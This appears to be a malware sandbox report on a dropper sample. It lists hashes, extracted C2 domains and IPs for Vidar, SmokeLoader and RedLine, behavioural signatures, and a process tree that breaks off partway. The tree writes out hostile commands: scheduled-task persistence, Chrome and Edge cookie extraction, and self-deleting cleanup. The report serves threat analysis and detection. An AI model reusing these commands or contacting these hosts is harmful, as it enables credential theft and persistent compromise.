Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    139s
  • max time network
    1832s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    28-07-2021 23:45

General

  • Target

    8 (11).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

28_7_r

C2

zertypelil.xyz:80

Extracted

Family

redline

C2

45.140.147.111:22333

Extracted

Family

redline

Botnet

NEW_5k

C2

86.106.181.209:18845

Extracted

Family

redline

Botnet

1k_TEST

C2

86.106.181.209:18845

Extracted

Family

vidar

Version

39.8

Botnet

865

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • suricata: ET MALWARE Win32/Kelihos.F exe Download 2
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 49 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 12 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 5 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 9 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 11 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 20 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2856
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2748
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2736
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2564
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2488
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1852
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1412
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1364
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1184
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1052
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:912
                      • C:\Users\Admin\AppData\Roaming\ijrivbf
                        C:\Users\Admin\AppData\Roaming\ijrivbf
                        2⤵
                          PID:2264
                          • C:\Users\Admin\AppData\Roaming\ijrivbf
                            C:\Users\Admin\AppData\Roaming\ijrivbf
                            3⤵
                              PID:1428
                          • C:\Users\Admin\AppData\Roaming\ehrivbf
                            C:\Users\Admin\AppData\Roaming\ehrivbf
                            2⤵
                              PID:180
                            • C:\Users\Admin\AppData\Roaming\vurivbf
                              C:\Users\Admin\AppData\Roaming\vurivbf
                              2⤵
                                PID:5204
                              • C:\Users\Admin\AppData\Local\68b2cfda-1816-4256-b2c4-6d6c713064e6\BB9B.exe
                                C:\Users\Admin\AppData\Local\68b2cfda-1816-4256-b2c4-6d6c713064e6\BB9B.exe --Task
                                2⤵
                                  PID:5776
                                  • C:\Users\Admin\AppData\Local\68b2cfda-1816-4256-b2c4-6d6c713064e6\BB9B.exe
                                    C:\Users\Admin\AppData\Local\68b2cfda-1816-4256-b2c4-6d6c713064e6\BB9B.exe --Task
                                    3⤵
                                      PID:5904
                                  • C:\ProgramData\Provisioning\settings.exe
                                    C:\ProgramData\Provisioning\settings.exe
                                    2⤵
                                      PID:5292
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                        3⤵
                                        • Creates scheduled task(s)
                                        PID:4960
                                    • C:\ProgramData\Provisioning\settings.exe
                                      C:\ProgramData\Provisioning\settings.exe
                                      2⤵
                                        PID:4820
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                          3⤵
                                          • Creates scheduled task(s)
                                          PID:4468
                                      • C:\Users\Admin\AppData\Roaming\ijrivbf
                                        C:\Users\Admin\AppData\Roaming\ijrivbf
                                        2⤵
                                          PID:576
                                          • C:\Users\Admin\AppData\Roaming\ijrivbf
                                            C:\Users\Admin\AppData\Roaming\ijrivbf
                                            3⤵
                                              PID:6100
                                          • C:\Users\Admin\AppData\Roaming\ehrivbf
                                            C:\Users\Admin\AppData\Roaming\ehrivbf
                                            2⤵
                                              PID:4036
                                            • C:\Users\Admin\AppData\Roaming\vurivbf
                                              C:\Users\Admin\AppData\Roaming\vurivbf
                                              2⤵
                                                PID:5296
                                              • C:\Users\Admin\AppData\Local\68b2cfda-1816-4256-b2c4-6d6c713064e6\BB9B.exe
                                                C:\Users\Admin\AppData\Local\68b2cfda-1816-4256-b2c4-6d6c713064e6\BB9B.exe --Task
                                                2⤵
                                                  PID:4272
                                                  • C:\Users\Admin\AppData\Local\68b2cfda-1816-4256-b2c4-6d6c713064e6\BB9B.exe
                                                    C:\Users\Admin\AppData\Local\68b2cfda-1816-4256-b2c4-6d6c713064e6\BB9B.exe --Task
                                                    3⤵
                                                      PID:808
                                                  • C:\ProgramData\Provisioning\settings.exe
                                                    C:\ProgramData\Provisioning\settings.exe
                                                    2⤵
                                                      PID:4124
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                        3⤵
                                                        • Creates scheduled task(s)
                                                        PID:2744
                                                    • C:\ProgramData\Provisioning\settings.exe
                                                      C:\ProgramData\Provisioning\settings.exe
                                                      2⤵
                                                        PID:5584
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                          3⤵
                                                          • Creates scheduled task(s)
                                                          PID:4240
                                                      • C:\Users\Admin\AppData\Roaming\ijrivbf
                                                        C:\Users\Admin\AppData\Roaming\ijrivbf
                                                        2⤵
                                                          PID:4104
                                                        • C:\Users\Admin\AppData\Roaming\ehrivbf
                                                          C:\Users\Admin\AppData\Roaming\ehrivbf
                                                          2⤵
                                                            PID:2320
                                                          • C:\Users\Admin\AppData\Roaming\vurivbf
                                                            C:\Users\Admin\AppData\Roaming\vurivbf
                                                            2⤵
                                                              PID:6056
                                                            • C:\Users\Admin\AppData\Local\68b2cfda-1816-4256-b2c4-6d6c713064e6\BB9B.exe
                                                              C:\Users\Admin\AppData\Local\68b2cfda-1816-4256-b2c4-6d6c713064e6\BB9B.exe --Task
                                                              2⤵
                                                                PID:4304
                                                              • C:\ProgramData\Provisioning\settings.exe
                                                                C:\ProgramData\Provisioning\settings.exe
                                                                2⤵
                                                                  PID:5796
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                    3⤵
                                                                    • Creates scheduled task(s)
                                                                    PID:5356
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                1⤵
                                                                  PID:1020
                                                                • C:\Users\Admin\AppData\Local\Temp\8 (11).exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\8 (11).exe"
                                                                  1⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:4656
                                                                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1968
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\setup_install.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\setup_install.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:3592
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                        4⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:4092
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\sonia_1.exe
                                                                          sonia_1.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:1012
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                        4⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:2660
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\sonia_2.exe
                                                                          sonia_2.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Checks SCSI registry key(s)
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          PID:636
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                        4⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:4172
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\sonia_3.exe
                                                                          sonia_3.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Modifies system certificate store
                                                                          PID:392
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 1700
                                                                            6⤵
                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                            • Program crash
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2644
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                                        4⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:4176
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\sonia_5.exe
                                                                          sonia_5.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:584
                                                                          • C:\Users\Admin\Documents\AuXMqOCdQ0ZL5kjm9qpzqruo.exe
                                                                            "C:\Users\Admin\Documents\AuXMqOCdQ0ZL5kjm9qpzqruo.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:1004
                                                                            • C:\Users\Admin\Documents\AuXMqOCdQ0ZL5kjm9qpzqruo.exe
                                                                              C:\Users\Admin\Documents\AuXMqOCdQ0ZL5kjm9qpzqruo.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4988
                                                                          • C:\Users\Admin\Documents\9AoGlsIL1XeO20DKCuSRA2wY.exe
                                                                            "C:\Users\Admin\Documents\9AoGlsIL1XeO20DKCuSRA2wY.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:1280
                                                                            • C:\Users\Admin\Documents\9AoGlsIL1XeO20DKCuSRA2wY.exe
                                                                              "C:\Users\Admin\Documents\9AoGlsIL1XeO20DKCuSRA2wY.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:668
                                                                          • C:\Users\Admin\Documents\F_MasfIqiRrJ5BqPeh9957vy.exe
                                                                            "C:\Users\Admin\Documents\F_MasfIqiRrJ5BqPeh9957vy.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:3848
                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              7⤵
                                                                                PID:5616
                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                7⤵
                                                                                  PID:4912
                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  7⤵
                                                                                    PID:5216
                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                    7⤵
                                                                                      PID:3852
                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      7⤵
                                                                                        PID:5152
                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                        7⤵
                                                                                          PID:4884
                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          7⤵
                                                                                            PID:4676
                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                            7⤵
                                                                                              PID:4272
                                                                                          • C:\Users\Admin\Documents\GmvZQvQ6oVkHW8Y5P6g1UqRn.exe
                                                                                            "C:\Users\Admin\Documents\GmvZQvQ6oVkHW8Y5P6g1UqRn.exe"
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            PID:3084
                                                                                            • C:\Users\Public\run.exe
                                                                                              C:\Users\Public\run.exe
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1016
                                                                                              • C:\Users\Public\run.exe
                                                                                                C:\Users\Public\run.exe
                                                                                                8⤵
                                                                                                  PID:4648
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\run.exe"
                                                                                                    9⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4368
                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                      timeout /T 10 /NOBREAK
                                                                                                      10⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:5824
                                                                                            • C:\Users\Admin\Documents\Rn7HzOoLS_M9BhTWy1r65F6c.exe
                                                                                              "C:\Users\Admin\Documents\Rn7HzOoLS_M9BhTWy1r65F6c.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:5108
                                                                                              • C:\Users\Admin\Documents\Rn7HzOoLS_M9BhTWy1r65F6c.exe
                                                                                                C:\Users\Admin\Documents\Rn7HzOoLS_M9BhTWy1r65F6c.exe
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4520
                                                                                            • C:\Users\Admin\Documents\m_SdyP_NsPJ6LeSDf2bedxYZ.exe
                                                                                              "C:\Users\Admin\Documents\m_SdyP_NsPJ6LeSDf2bedxYZ.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2536
                                                                                              • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:1798690 "__IRAFN:C:\Users\Admin\Documents\m_SdyP_NsPJ6LeSDf2bedxYZ.exe" "__IRCT:3" "__IRTSS:0" "__IRSID:S-1-5-21-1594587808-2047097707-2163810515-1000"
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:4312
                                                                                                • C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe"
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:4052
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im smartmap.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe" & del C:\ProgramData\*.dll & exit
                                                                                                    9⤵
                                                                                                      PID:2872
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /im smartmap.exe /f
                                                                                                        10⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:3148
                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                        timeout /t 6
                                                                                                        10⤵
                                                                                                        • Delays execution with timeout.exe
                                                                                                        PID:4872
                                                                                              • C:\Users\Admin\Documents\LHGQjG4UkiDc6XIDU5rzjRlD.exe
                                                                                                "C:\Users\Admin\Documents\LHGQjG4UkiDc6XIDU5rzjRlD.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2824
                                                                                              • C:\Users\Admin\Documents\RVF7VlV930iq99Wjq4qUm2av.exe
                                                                                                "C:\Users\Admin\Documents\RVF7VlV930iq99Wjq4qUm2av.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2628
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2690704368.exe"
                                                                                                  7⤵
                                                                                                    PID:2220
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2690704368.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\2690704368.exe"
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5856
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 2690704368.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2690704368.exe" & del C:\ProgramData\*.dll & exit
                                                                                                        9⤵
                                                                                                          PID:4460
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /im 2690704368.exe /f
                                                                                                            10⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:5660
                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                            timeout /t 6
                                                                                                            10⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:4912
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7334510629.exe"
                                                                                                      7⤵
                                                                                                        PID:4272
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7334510629.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\7334510629.exe"
                                                                                                          8⤵
                                                                                                            PID:3208
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "RVF7VlV930iq99Wjq4qUm2av.exe" /f & erase "C:\Users\Admin\Documents\RVF7VlV930iq99Wjq4qUm2av.exe" & exit
                                                                                                          7⤵
                                                                                                            PID:1340
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /im "RVF7VlV930iq99Wjq4qUm2av.exe" /f
                                                                                                              8⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:1752
                                                                                                        • C:\Users\Admin\Documents\D_Ado2RQJa8ozVyMqFOSkQAR.exe
                                                                                                          "C:\Users\Admin\Documents\D_Ado2RQJa8ozVyMqFOSkQAR.exe"
                                                                                                          6⤵
                                                                                                            PID:4472
                                                                                                            • C:\Users\Admin\Documents\D_Ado2RQJa8ozVyMqFOSkQAR.exe
                                                                                                              C:\Users\Admin\Documents\D_Ado2RQJa8ozVyMqFOSkQAR.exe
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4984
                                                                                                          • C:\Users\Admin\Documents\AXLCMj_P3dccJjN6oW2M1b0j.exe
                                                                                                            "C:\Users\Admin\Documents\AXLCMj_P3dccJjN6oW2M1b0j.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2224
                                                                                                            • C:\Users\Admin\Documents\AXLCMj_P3dccJjN6oW2M1b0j.exe
                                                                                                              "C:\Users\Admin\Documents\AXLCMj_P3dccJjN6oW2M1b0j.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4708
                                                                                                          • C:\Users\Admin\Documents\iN2aVAt2WPm4WgtdiaR7pTiK.exe
                                                                                                            "C:\Users\Admin\Documents\iN2aVAt2WPm4WgtdiaR7pTiK.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4084
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                                                                              7⤵
                                                                                                                PID:4028
                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                                                                                  8⤵
                                                                                                                  • Creates scheduled task(s)
                                                                                                                  PID:5460
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5780
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                                                                                  8⤵
                                                                                                                    PID:4128
                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                                                                                      9⤵
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:2324
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
